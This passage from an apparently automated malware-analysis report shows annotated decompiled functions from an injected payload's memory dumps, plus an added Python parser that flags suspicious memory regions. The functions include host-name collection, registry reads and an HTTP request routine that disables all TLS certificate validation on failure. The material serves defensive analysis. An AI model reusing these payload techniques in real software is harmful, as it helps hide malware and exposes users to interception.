                               					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed; slot 0 = IUnknown::QueryInterface; the APIs list resolves it to RPCRT4!IUnknown_QueryInterface_Proxy, so the object is a COM proxy to an out-of-process server
                               					_t51 = _t23;
                               					if(_t51 >= 0) {
                               						_t26 = _v12;
                               						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8); // slot 7 (offset 0x1c) called as (this, &_v8): third interface -> _v8
                               						if(_t51 >= 0) {
                               							_t48 =  *0x49dd2b8; // 0xe3a5a8
                               							_t30 = _v8;
                               							_t12 = _t48 + 0x49de47c; // 0xa4c6892c: riid
                               							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed; QueryInterface again, result written to the caller's _a4
                               							_t51 = _t31;
                               							_t32 = _v8;
                               							 *((intOrPtr*)( *_t32 + 8))(_t32); // slot 2 = IUnknown::Release
                               						}
                               						_t28 = _v12;
                               						 *((intOrPtr*)( *_t28 + 8))(_t28); // Release
                               					}
                               					_t24 = _v16;
                               					 *((intOrPtr*)( *_t24 + 8))(_t24); // Release
                               				}
                               				return _t51; // HRESULT
                               			}

                               Instruction address column for the listing above (detached from its lines during extraction): 0x049d5f7e to 0x049d6003

                              APIs
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049D5FAF
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049D5FE0
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Interface_ProxyQueryUnknown_
                              • String ID:
                              • API String ID: 2522245112-0
                              • Opcode ID: 2e27078a07f7d905dd548ab04bf8f9fc6a8a2b3113f07af5984e47527f414670
                              • Instruction ID: 65d4c89745b6c26780d539ff7548e55b789f4c7853d036d343aac4b686d7d7a1
                              • Opcode Fuzzy Hash: 2e27078a07f7d905dd548ab04bf8f9fc6a8a2b3113f07af5984e47527f414670
                              • Instruction Fuzzy Hash: 68213A75A00619AFCB00DFA8C888D9AB779EFC8714B15C698E905DF364D670EE45CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 053DCE2E
                              • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 053DCE75
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                              • String ID:
                              • API String ID: 552344955-0
                              • Opcode ID: 4195167e41ae0d941e8e36a72aeb138708bee89521663ba029aa5130be8d05b4
                              • Instruction ID: ee964229822cf56cd87e04f63a36c74e1752dd5f6049a0a539c057ce2971a7f1
                              • Opcode Fuzzy Hash: 4195167e41ae0d941e8e36a72aeb138708bee89521663ba029aa5130be8d05b4
                              • Instruction Fuzzy Hash: BB118AB2A10208ABC721DFA8E848B9EFBFDFF94655F114059E40197140DBB48E05C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,00000000,69B25F44,00000000,053C4FAB), ref: 053D9478
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,053C4FAB,?,00000000), ref: 053D94D9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Time$FileFreeHeapSystem
                              • String ID:
                              • API String ID: 892271797-0
                              • Opcode ID: a694e407e17f1801405969d2daf7ae67218814ae4f1ae1e5f517f1f54b8271cf
                              • Instruction ID: 2ea5e3c9b00ad6e9ca8cb73e43345027fa581325198f45eb8e8aca693ee8f2ba
                              • Opcode Fuzzy Hash: a694e407e17f1801405969d2daf7ae67218814ae4f1ae1e5f517f1f54b8271cf
                              • Instruction Fuzzy Hash: D1110AB6E10208FFCB11DBA4E949BDEBBBCAB08305F1040A6B902E6145DA749B549B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 049D24C2
                                • Part of subcall function 049D5A5E: SysFreeString.OLEAUT32(?), ref: 049D5B3D
                              • SafeArrayDestroy.OLEAUT32(?), ref: 049D250F
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ArraySafe$CreateDestroyFreeString
                              • String ID:
                              • API String ID: 3098518882-0
                              • Opcode ID: 1568369d0bf23196213fa845452e90091dd83a2cc9b84d7ce081ea70740bc4d7
                              • Instruction ID: 580f140c276b4784f294c137f65409e88b03bd6a1ffb38812bd2a900d3d1300a
                              • Opcode Fuzzy Hash: 1568369d0bf23196213fa845452e90091dd83a2cc9b84d7ce081ea70740bc4d7
                              • Instruction Fuzzy Hash: C3115B72A0050ABFDF01DFA8C844EEEBBB9EB18310F018165FA04E6160E375EA55DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                               			E049DA415(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                               				void* _t24;
                               				signed short _t25;
                               				signed int _t27;
                               				intOrPtr* _t28;
                               				signed short _t29;
                               
                               				// Fetches a wide-character value into *__edi. When a handle is supplied in _a4
                               				// the value is first requested through E049D3196; if that fails, or _a4 is 0,
                               				// it falls back to E049D5607 with 0x80000002 = HKEY_LOCAL_MACHINE (most likely
                               				// a registry read), which returns a heap buffer in _a4 and its byte length in _a12.
                               				_t28 = __edi;
                               				if(_a4 == 0) {
                               					L2:
                               					_t29 = E049D5607(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                               					if(_t29 == 0) {
                               						_t27 = _a12 >> 1; // byte length -> WCHAR count
                               						if(_t27 == 0) {
                               							_t29 = 2; // empty value: release the buffer and report 2 (ERROR_FILE_NOT_FOUND if read as a Win32 error code)
                               							HeapFree( *0x49dd270, 0, _a4); // *0x49dd270 holds the cached process heap handle
                               						} else {
                               							_t24 = _a4;
                               							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29; // _t29 == 0 here: zero the last WCHAR so the string is always terminated
                               							 *_t28 = _t24; // hand the buffer to the caller
                               						}
                               					}
                               					L6:
                               					return _t29;
                               				}
                               				_t25 = E049D3196(_a4, _a8, _a12, __edi); // executed; first attempt through the supplied handle (its subcalls free a BSTR, see APIs)
                               				_t29 = _t25;
                               				if(_t29 == 0) {
                               					goto L6; // success: the result has already been stored through __edi
                               				}
                               				goto L2; // otherwise fall back to HKEY_LOCAL_MACHINE
                               			}

                               Instruction address column for the listing above (detached from its lines during extraction): 0x049da415 to 0x049da480

                              APIs
                                • Part of subcall function 049D3196: SysFreeString.OLEAUT32(00000000), ref: 049D31FC
                              • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,049D4C93,?,004F0053,058193B8,00000000,?), ref: 049DA476
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Free$HeapString
                              • String ID: Uxt
                              • API String ID: 3806048269-1536154274
                              • Opcode ID: 41566d7613b2ba72e03f5b0ae0483bcb27e65fde8ae9309b36a15ac0b1555cc4
                              • Instruction ID: 7a4c075ef4d4b0c9223a66e17a68d9b25f725bbcb9ebef1478cc97fea2db9c4b
                              • Opcode Fuzzy Hash: 41566d7613b2ba72e03f5b0ae0483bcb27e65fde8ae9309b36a15ac0b1555cc4
                              • Instruction Fuzzy Hash: 33012436101259BBCF229F48CC09EEA3B6AEB08790F05C029FE045A520D731E970DBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SysAllocString.OLEAUT32(049DA6E1), ref: 049D2645
                                • Part of subcall function 049D5A5E: SysFreeString.OLEAUT32(?), ref: 049D5B3D
                              • SysFreeString.OLEAUT32(00000000), ref: 049D2685
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: ca0db5b7808c674a8366b07c674560b711457302fef1a7d9c8840a1d2d9899bc
                              • Instruction ID: 352b35175de9ff3f0fb137668b60570b9a0b2e4da3f3bbcf4b80856f4bf2e298
                              • Opcode Fuzzy Hash: ca0db5b7808c674a8366b07c674560b711457302fef1a7d9c8840a1d2d9899bc
                              • Instruction Fuzzy Hash: CE014F7250160ABBDF119F68D804D9BBBB9EF44314B018171EA05A6160D774ED15CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                               			E049D40AC(void* __ecx) {
                               				signed int _v8;
                               				signed int _t10;
                               				void* _t15;
                               				void* _t19;
                               				void* _t20;
                               				void* _t22;
                               				intOrPtr* _t23;
                               
                               				// Returns the host's fully qualified DNS name in a freshly allocated heap buffer
                               				// (0 on failure). _t23 is GetComputerNameExA (see APIs); its first argument 3 is
                               				// ComputerNameDnsFullyQualified. Classic two-call pattern: probe the required
                               				// size with a NULL buffer, allocate, then read the name for real.
                               				_t23 = __imp__;
                               				_t20 = 0;
                               				_v8 = _v8 & 0; // required size = 0
                               				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed; size probe, _v8 receives the needed length (the trailing arguments are decompiler noise)
                               				_t10 = _v8;
                               				if(_v8 != 0) {
                               					_t20 = E049D55DC(_t10 + 1); // RtlAllocateHeap wrapper (see APIs); +1 for the terminator
                               					if(_t20 != 0) {
                               						_t15 =  *_t23(3, _t20,  &_v8); // executed; second call fills the buffer
                               						if(_t15 != 0) {
                               							 *((char*)(_v8 + _t20)) = 0; // NUL-terminate at the returned length
                               						} else {
                               							E049D6DFA(_t20); // RtlFreeHeap wrapper (see APIs)
                               							_t20 = 0;
                               						}
                               					}
                               				}
                               				return _t20;
                               			}

                               Instruction address column for the listing above (detached from its lines during extraction): 0x049d40b1 to 0x049d40fd

                              APIs
                              • GetComputerNameExA.KERNEL32(00000003,00000000,049D63F4,770CC740,00000000,?,?,049D63F4), ref: 049D40C4
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • GetComputerNameExA.KERNEL32(00000003,00000000,049D63F4,049D63F5,?,?,049D63F4), ref: 049D40E1
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ComputerHeapName$AllocateFree
                              • String ID:
                              • API String ID: 187446995-0
                              • Opcode ID: 230fb245d2eacea2b23790dcc10772d6c18f895f755f52c327bed8c95a6d100e
                              • Instruction ID: 224b858432492777e43cf96e58545879539de340310eca4d02fc4da79ffdde68
                              • Opcode Fuzzy Hash: 230fb245d2eacea2b23790dcc10772d6c18f895f755f52c327bed8c95a6d100e
                              • Instruction Fuzzy Hash: 79F0BE37600109BAEB11D6AACC00EAF3ABDDBC1650F224079A914E3141EA70EE068770
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(053F0460), ref: 053E3BEB
                              • RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053E3C27
                                • Part of subcall function 053D4CC6: lstrlen.KERNEL32(053EF4B4,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D13
                                • Part of subcall function 053D4CC6: VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D25
                                • Part of subcall function 053D4CC6: lstrcpy.KERNEL32(00000000,053EF4B4), ref: 053D4D34
                                • Part of subcall function 053D4CC6: VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D45
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                              • String ID:
                              • API String ID: 1872894792-0
                              • Opcode ID: 8ee0f7633c8f4f4352f225c1b8766a502e4180549513424193c5825c0697faf5
                              • Instruction ID: c340b798d2c3d06a854d918e9ace598aed6bd860a6ce1c0510ad0988faf67c0e
                              • Opcode Fuzzy Hash: 8ee0f7633c8f4f4352f225c1b8766a502e4180549513424193c5825c0697faf5
                              • Instruction Fuzzy Hash: BCF0EC763012189F86246F5CAD8D879FBECFB49611715015EFA0667341CE72AC109F90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D43EF: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D4428
                                • Part of subcall function 053D43EF: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 053D445E
                                • Part of subcall function 053D43EF: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 053D446A
                                • Part of subcall function 053D43EF: lstrcmpi.KERNEL32(?,00000000), ref: 053D44A7
                                • Part of subcall function 053D43EF: StrChrA.SHLWAPI(?,0000002E), ref: 053D44B0
                                • Part of subcall function 053D43EF: lstrcmpi.KERNEL32(?,00000000), ref: 053D44C2
                                • Part of subcall function 053D43EF: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 053D4513
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,053EC5B8,0000002C,053D656E,064F8DBA,?,00000000,053CEAB2), ref: 053E3518
                                • Part of subcall function 053D1635: GetProcAddress.KERNEL32(?,00000000), ref: 053D165E
                                • Part of subcall function 053D1635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,053E684F,00000000,00000000,00000028,00000100), ref: 053D1680
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,053EC5B8,0000002C,053D656E,064F8DBA,?,00000000,053CEAB2,?,00000318), ref: 053E35A3
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                              • String ID:
                              • API String ID: 4138075514-0
                              • Opcode ID: 56c9586a352c49e089d6bfa2a2cdb8eda355f05c4a0ce45299621207a6d9f0fc
                              • Instruction ID: 692779aa80d715cbb43f9858bc8a60d06e89806242d9fc104b99c4f51c07c2f2
                              • Opcode Fuzzy Hash: 56c9586a352c49e089d6bfa2a2cdb8eda355f05c4a0ce45299621207a6d9f0fc
                              • Instruction Fuzzy Hash: 6821F571E01228EBCF11DFA5DC88ADEBBB5BF08720F14812AF914B6290D3745A41DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

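                               The per-function entries above all follow one fixed layout: an "APIs" list (call, module, argument snapshot, reference address, optionally tagged as belonging to a subcall) followed by a "Memory Dump Source" line whose .sdmp name encodes where the code was dumped from. The Python script below is an added example, not part of the report and not Joe Sandbox's own code; it parses that layout into records and decodes the dump name so the reader can flag regions that should not contain code at all. The six-field name layout (process index, phase, dump counter, base address, page protection, region type) is an assumption that agrees with the "Offset:" value printed beside each name and with the standard Win32 PAGE_* and MEM_* constants; the sample text inside the script is copied from two entries above (one long argument list shortened).

```python
"""Parse the 'APIs' / 'Memory Dump Source' entries of a Joe Sandbox
decompilation listing and flag memory regions that should not hold code.

Added example: not code from the report or from the sandbox vendor.
Assumption: the .sdmp name has six dot-separated fields, read here as
<process index>.<phase>.<dump counter>.<base address>.<page protection>.<region type>;
protection and type are decoded with the Win32 PAGE_* and MEM_* constants.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Win32 MEMORY_BASIC_INFORMATION.Protect / .Type values
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

API_RE = re.compile(
    r"^•?\s*(?:Part of subcall function\s+(?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
DUMP_RE = re.compile(
    r"Source File:\s*(?P<name>[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.[0-9A-Fa-f]{16}"
    r"\.[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.sdmp),\s*Offset:\s*[0-9A-Fa-f]+,\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: int                     # address of the call site
    via_subcall: Optional[int]   # callee address when tagged "Part of subcall function"


@dataclass
class DumpRegion:
    name: str
    process_index: int
    phase: int
    dump_id: int
    base: int
    protect: int
    mem_type: int
    based_on_pe: bool

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    region: Optional[DumpRegion] = None


def parse_dump_name(name: str, based_on_pe: bool) -> DumpRegion:
    proc, phase, dump_id, base, protect, mtype = name[: -len(".sdmp")].split(".")
    return DumpRegion(name, int(proc, 16), int(phase, 16), int(dump_id, 10),
                      int(base, 16), int(protect, 16), int(mtype, 16), based_on_pe)


def parse_report(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'APIs' header; the dump line that follows belongs to it."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            caller = int(m["caller"], 16) if m["caller"] else None
            cur.apis.append(ApiCall(m["func"], m["module"], args, int(m["ref"], 16), caller))
            continue
        m = DUMP_RE.search(line)
        if m:
            cur.region = parse_dump_name(m["name"], m["pe"] == "true")
    return entries


def region_flags(r: DumpRegion) -> List[str]:
    """Heuristics for code living where a benign process keeps none."""
    flags: List[str] = []
    executable = bool(r.protect & 0xF0)  # any PAGE_EXECUTE* value
    writable = bool(r.protect & 0xCC)    # READWRITE, WRITECOPY and their EXECUTE variants
    if executable and writable:
        flags.append("rwx")
    if executable and r.mem_type != MEM_IMAGE:
        flags.append("exec-not-image-backed")  # code outside any loader-mapped module
    if executable and r.mem_type != MEM_IMAGE and r.based_on_pe:
        flags.append("pe-header-in-private-memory")  # a PE mapped by hand, not by the loader
    return flags


def apis_by_module(entries: List[FunctionEntry]) -> Dict[str, Set[str]]:
    out: Dict[str, Set[str]] = {}
    for e in entries:
        for a in e.apis:
            out.setdefault(a.module, set()).add(a.func)
    return out


# Constructed input: two entries copied from the report above (one argument list shortened).
SAMPLE = """\
APIs
  • Part of subcall function 049D6A4D: SysAllocString.OLEAUT32(80000002), ref: 049D6AA4
• SysFreeString.OLEAUT32(?), ref: 049D5B3D
Memory Dump Source
• Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
Similarity
APIs
• RegQueryValueExA.KERNEL32(00000001,064F8578,00000000,?,053EF06C), ref: 053D000B
• RegCloseKey.ADVAPI32(?), ref: 053D0054
Memory Dump Source
• Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
"""

if __name__ == "__main__":
    for e in parse_report(SAMPLE):
        r = e.region
        print(f"{r.base:#010x} {r.protect_name} {r.type_name} pe={r.based_on_pe} flags={region_flags(r)}")
        for a in e.apis:
            tag = f" (via {a.via_subcall:#x})" if a.via_subcall else ""
            print(f"    {a.module}!{a.func}{tag} @ {a.ref:#x} args={a.args}")
```

Run against the two entries it embeds, the script reports the 049D0000 dump as PAGE_EXECUTE_READ private memory that carries a PE header (executable code outside any loader-mapped module, consistent with the report's "based on PE: true") and the 053C0000 dump as a PAGE_EXECUTE_READWRITE private region with no PE header, which is the profile of an injected payload. The registry, VirtualAlloc and EnumProcessModules listings in this section come from that 053C0000 region; the OLEAUT32, COM-proxy and GetComputerNameExA listings come from 049D0000.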
                              C-Code - Quality: 32%
                               			E049D8F5E(intOrPtr _a4, signed int _a8) {
                               				long _v8;
                               				long _v12;
                               				long _v16; // typed char by the decompiler; it is passed with length 4, i.e. a DWORD
                               				void* _t14;
                               				long _t15;
                               				char* _t17;
                               				intOrPtr* _t19;
                               				signed int _t22;
                               
                               				// Sends a request and, when the TLS handshake fails, switches certificate
                               				// validation off and retries once. The import in _t19 is not resolved in this
                               				// dump; its seven-argument shape and the error codes below match WinHttpSendRequest
                               				// (inferred, not confirmed by the report): _a4 = hRequest, _a8 = lpszHeaders,
                               				// _t22 = dwHeadersLength (-1 when headers are present, 0 otherwise).
                               				_t19 = __imp__; // 0x703be700
                               				_t22 =  ~_a8;
                               				_v12 = 0; // set once the relaxed security flags have been applied
                               				asm("sbb esi, esi"); // _t22 = (_a8 != 0) ? -1 : 0
                               				while(1) {
                               					_v8 = 0;
                               					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed; (hRequest, headers, headersLen, optional, optionalLen, totalLen, context)
                               					if(_t14 != 0) {
                               						break; // success, _v8 is still 0
                               					}
                               					_t15 = GetLastError();
                               					_v8 = _t15;
                               					if(_t15 != 0x2f8f) { // 0x2f8f = 12175 = ERROR_WINHTTP_SECURE_FAILURE
                               						if(_t15 == 0x2f00) { // 0x2f00 = 12032 = ERROR_WINHTTP_RESEND_REQUEST: simply resend
                               							continue;
                               						}
                               					} else {
                               						// 0x3300 = SECURITY_FLAG_IGNORE_UNKNOWN_CA (0x100) | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE (0x200)
                               						//        | SECURITY_FLAG_IGNORE_CERT_CN_INVALID (0x1000) | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID (0x2000)
                               						_v16 = 0x3300;
                               						if(_v12 == 0) {
                               							_t17 =  &_v16;
                               							__imp__(_a4, 0x1f, _t17, 4); // 0x1f = 31 = WINHTTP_OPTION_SECURITY_FLAGS (WinHttpSetOption shape, inferred): every certificate check is disabled
                               							if(_t17 == 0) {
                               								_v8 = GetLastError();
                               							} else {
                               								_v12 = 1; // retry exactly once with validation disabled
                               								continue;
                               							}
                               						}
                               					}
                               					L9:
                               					return _v8; // 0 on success, otherwise the last Win32 error
                               				}
                               				goto L9;
                               			}

                               Instruction address column for the listing above (detached from its lines during extraction): 0x049d8f65 to 0x049d8fe2

                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: c6d299c74a8fb9d4fe46abdf729c012536efcb49ba94d8e17dcb2883c222fe47
                              • Instruction ID: 2583c21f539e7df02a885171907a5caddc45c9a3052da663912d945a8ee26e1c
                              • Opcode Fuzzy Hash: c6d299c74a8fb9d4fe46abdf729c012536efcb49ba94d8e17dcb2883c222fe47
                              • Instruction Fuzzy Hash: F5012D31944108FBDF14EF99D84899FBFBEEB88750F10C076EA21E2141D774AA44DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?), ref: 053CB1EF
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: baf1daf17a21de397ba0aa1d69b48f51caf23529a532cd86f51cb956704055c9
                              • Instruction ID: b09eabc20a67b882156038f941721ce4c086ab5b49e564a1fec8245aaf32b6ca
                              • Opcode Fuzzy Hash: baf1daf17a21de397ba0aa1d69b48f51caf23529a532cd86f51cb956704055c9
                              • Instruction Fuzzy Hash: 25315076A00118EFCB10DF98D896DADFBF9FB44324F9584AEE106AB251D6B0AD01CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E049D78A8(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                              				signed int _v5;
                              				signed int _v12;
                              				void* _t32;
                              				signed int _t37;
                              				signed int _t39;
                              				signed char _t45;
                              				void* _t49;
                              				char* _t51;
                              				signed int _t65;
                              				signed int _t66;
                              				signed int _t69;
                              
                              				_v12 = _v12 & 0x00000000;
                              				_t69 = __eax;
                              				_t32 = RtlAllocateHeap( *0x49dd270, 0, __eax << 2); // executed
                              				_t49 = _t32;
                              				if(_t49 == 0) {
                              					_v12 = 8;
                              				} else {
                              					 *_a8 = _t49;
                              					do {
                              						_t45 =  *_a4;
                              						asm("cdq");
                              						_t65 = 0x64;
                              						_t37 = (_t45 & 0x000000ff) / _t65;
                              						_v5 = _t37;
                              						if(_t37 != 0) {
                              							 *_t49 = _t37 + 0x30;
                              							_t49 = _t49 + 1;
                              							_t45 = _t45 + _t37 * 0x9c;
                              						}
                              						asm("cdq");
                              						_t66 = 0xa;
                              						_t39 = (_t45 & 0x000000ff) / _t66;
                              						if(_t39 != 0 || _v5 != _t39) {
                              							 *_t49 = _t39 + 0x30;
                              							_t49 = _t49 + 1;
                              							_t45 = _t45 + _t39 * 0xf6;
                              						}
                              						_a4 = _a4 + 1;
                              						 *_t49 = _t45 + 0x30;
                              						 *(_t49 + 1) = 0x2c;
                              						_t49 = _t49 + 2;
                              						_t69 = _t69 - 1;
                              					} while (_t69 != 0);
                              					_t51 = _t49 - 1;
                              					 *_a12 = _t51 -  *_a8;
                              					 *_t51 = 0;
                              				}
                              				return _v12;
                              			}

